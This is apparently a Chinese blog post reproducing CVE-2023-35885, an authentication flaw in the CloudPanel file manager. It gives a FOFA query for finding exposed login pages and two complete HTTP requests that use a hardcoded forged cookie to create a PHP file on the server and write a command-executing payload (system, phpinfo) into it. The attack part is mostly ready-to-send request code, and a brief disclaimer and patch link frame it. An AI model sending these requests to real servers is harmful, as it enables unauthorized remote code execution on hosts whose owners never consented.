企业电器网站建设方案,东莞手机app开发,汕头市建设局网站,最近的十大新闻文章目录 前言声明一、CloudPanel 简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议 前言
CloudPanel 是一个基于 Web 的控制面板或管理界面#xff0c;旨在简化云托管环境的管理。它提供了一个集中式平台#xff0c;用于管理云基础架构的各个方面#xff0c;包括 旨在简化云托管环境的管理。它提供了一个集中式平台用于管理云基础架构的各个方面包括 VM、存储、网络和应用程序。 声明
请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、CloudPanel 简介
CloudPanel 是一个基于 Web 的控制面板或管理界面旨在简化云托管环境的管理。它提供了一个集中式平台用于管理云基础架构的各个方面包括 VM、存储、网络和应用程序。
二、漏洞描述
CloudPanel是CloudPanel开源的一款免费软件。用于配置和管理服务器。CloudPanel 2.3.1之前版本存在安全漏洞该漏洞源于具有不安全的文件管理器cookie身份验证。
CVE编号:CVE-2023-35885 CNNVD编号:CNNVD-202306-1507 三、影响版本
CloudPanel 2.3.1之前版本
四、漏洞复现
FOFAtitleCloudPanel | Log In
漏洞链接https://127.0.0.1/file-manager/backend/makefile
漏洞数据包
创建文件
POST /file-manager/backend/makefile HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: clp-fmZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM
Content-Length: 44
Content-Type: application/x-www-form-urlencodedid/htdocs/app/files/public/nametest.php写内容进文件
POST /file-manager/backend/text HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: clp-fmZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM
Content-Length: 85
Content-Type: application/x-www-form-urlencodedid/htdocs/app/files/public/test.phpcontent?php echo system(id);phpinfo();unlink(__FILE__)?访问创建的文件
五、修复建议
官方补丁 https://www.cloudpanel.io/docs/v2/changelog/